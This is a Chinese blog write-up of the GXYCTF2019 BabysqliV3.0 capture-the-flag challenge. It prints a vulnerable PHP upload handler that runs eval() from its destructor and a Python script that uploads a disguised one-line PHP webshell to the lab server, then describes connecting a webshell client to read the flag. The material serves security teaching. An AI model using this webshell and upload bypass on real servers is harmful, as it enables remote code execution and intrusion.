GXYCTF2019-BabysqliV3.0

摘要
文件上传、phar反序列化


#### 爆破

进入题目是一个登录界面,可知用户名是admin,爆破得密码为password,进入上传页面

源码读取

页面通过 file 参数加载文件，利用伪协议可以读出 upload.php 的源码：

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />

<form action="" method="post" enctype="multipart/form-data">
上传文件
<input type="file" name="file" />
<input type="submit" name="submit" value="上传" />
</form>

<?php
// Silences every PHP warning/notice for the rest of the script, including the
// ones the code below would otherwise emit (undefined globals, failed mkdir,
// failed file_get_contents).
error_reporting(0);
/**
 * Builds and runs the file-upload action for the current session user.
 *
 * The object keeps its next action as PHP source text in $cmd and runs that
 * text with eval() from __destruct(). Every check in this class only decides
 * which string ends up in $cmd; none of them stops the eval() itself.
 */
class Uploader{
    // Destination path of the upload. Taken verbatim from ?name= when present
    // (see __construct), otherwise a per-user path inside uploads/.
    public $Filename;
    // PHP source executed by __destruct().
    public $cmd;
    // Session user captured at construction; __destruct compares it to $_SESSION.
    public $token;


    function __construct(){
        // Per-user sandbox directory: <cwd>/uploads/<md5(user)>/
        $sandbox = getcwd()."/uploads/".md5($_SESSION['user'])."/";
        $ext = ".txt";
        @mkdir($sandbox, 0777, true);
        // Blacklist check on ?name=. The alternatives are written with spaces
        // around "|", so the pattern actually rejects "data:// ", " filter:// ",
        // " php:// " and " ." (space followed by dot) rather than the bare
        // tokens: a name such as "a.php" passes, and nothing confines the
        // resulting path to $sandbox.
        if(isset($_GET['name']) and !preg_match("/data:\/\/ | filter:\/\/ | php:\/\/ | \./i", $_GET['name'])){
            $this->Filename = $_GET['name'];
        }
        else{
            // Default destination: <sandbox>/<user>.txt
            $this->Filename = $sandbox.$_SESSION['user'].$ext;
        }

        $this->cmd = "echo '<br><br>Master, I want to study rizhan!<br><br>';";
        $this->token = $_SESSION['user'];
    }

    function upload($file){
        // No global $sandbox / $ext exists in this listing (both are locals of
        // __construct), so these bind to null and are unused below.
        global $sandbox;
        global $ext;

        // "[" and "]" are taken as the regex delimiters here, so the pattern
        // is the literal "^a-z0-9": it only matches a filename that starts with
        // the text "a-z0-9", and the intended character-class check never fires.
        if(preg_match("[^a-z0-9]", $this->Filename)){
            $this->cmd = "die('illegal filename!');";
        }
        else{
            // Size is the only property of the upload that is inspected;
            // content, extension and declared MIME type are not.
            if($file['size'] > 1024){
                $this->cmd = "die('you are too big (′▽`〃)');";
            }
            else{
                // The move is deferred: it is built as source text for eval(),
                // with $Filename interpolated unescaped into that text.
                $this->cmd = "move_uploaded_file('".$file['tmp_name']."', '" . $this->Filename . "');";
            }
        }
    }

    // Returns the raw destination path; used by file_get_contents($uploader)
    // and the echo in the caller. The sandbox-prefixed form is commented out.
    function __toString(){
        global $sandbox;
        global $ext;
        // return $sandbox.$this->Filename.$ext;
        return $this->Filename;
    }

    function __destruct(){
        // A token mismatch only swaps $cmd for a die(); eval() runs either way.
        if($this->token != $_SESSION['user']){
            $this->cmd = "die('check token falied!');";
        }
        eval($this->cmd);
    }
}

// Handler for the form above: the constructor has already chosen the
// destination path from ?name=, upload() records the move command, and the
// block then reads back whatever exists at that path.
if(isset($_FILES['file'])) {
    $uploader = new Uploader();
    $uploader->upload($_FILES["file"]);
    // Both reads go through Uploader::__toString(), i.e. the raw $Filename.
    // NOTE(review): the move itself only happens inside __destruct()'s eval(),
    // presumably when $uploader is released after this block, so the content
    // echoed here is what was at that path before this request — confirm.
    if(@file_get_contents($uploader)){
        echo "下面是你上传的文件:<br>".$uploader."<br>";
        echo file_get_contents($uploader);
    }
}

?>

这样 Filename 就可以直接通过 name 参数控制了……构造函数里的黑名单正则在 `|` 两侧带了空格，`\.` 这一分支实际匹配的是“空格+点”，所以 `a.php` 不会被拦截；而 upload() 里的 `preg_match("[^a-z0-9]", ...)` 把 `[` `]` 当成了定界符，实际模式是字面量 `^a-z0-9`，文件名检查形同虚设。

flag

# coding: utf-8
# (the original "# coding : utf-8" has a space before the colon and is not a
# valid PEP 263 declaration; harmless here since the file is ASCII-only)
#
# Upload request used in the writeup against the upload.php listing above.
# Everything the server checks is visible in that listing: only
# $_FILES['file']['size'] is inspected, and ?name= is copied to $Filename
# after a blacklist regex whose "\." alternative carries a leading space.

import requests

# File content as written to the server; it is a one-line PHP stager.
shell = "<?php @eval($_POST['ok']) ?>"

# Leading file-signature bytes. The listing above performs no content or
# magic-byte check, so this prefix is not needed against this target; the
# alternatives the author tried are kept below (GIF, JPEG "\xff\xd8", XBM header).
prefix = "GIF8!"
# GIF8!
# \xff\xd8
# #define counter_width 40 \n#define counter_height 10

con = prefix + "\n" + shell

# ?name=a.php becomes Uploader::$Filename unchanged (see __construct).
url = "http://52b220e2-8b31-4060-bb76-cb7660d396fe.node4.buuoj.cn:81/upload.php?name=a.php"
# Session of the logged-in user; __destruct() compares $token to $_SESSION['user'].
cookie = {"PHPSESSID": "6d3b93db04ced5af36d7fbc5fe9771a2"}

headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0'}
# The local filename and the declared image/jpeg MIME type are never read by
# the server; the mismatch between declared type and PHP content is, however,
# the obvious thing for an upload gateway or WAF to flag.
files = {
'file': ('1.php', con, 'image/jpeg'),
}

response = requests.post(url=url, headers=headers, files=files, cookies=cookie)

# Server response: the echo of the file currently at $Filename, if any.
res = response.text
print(res)

蚁剑连接,找flag.php获取flag……

phar

[GXYCTF2019]BabysqliV3.0-phar反序列化

作者

inanb

发布于

2021-09-21

更新于

2021-09-21
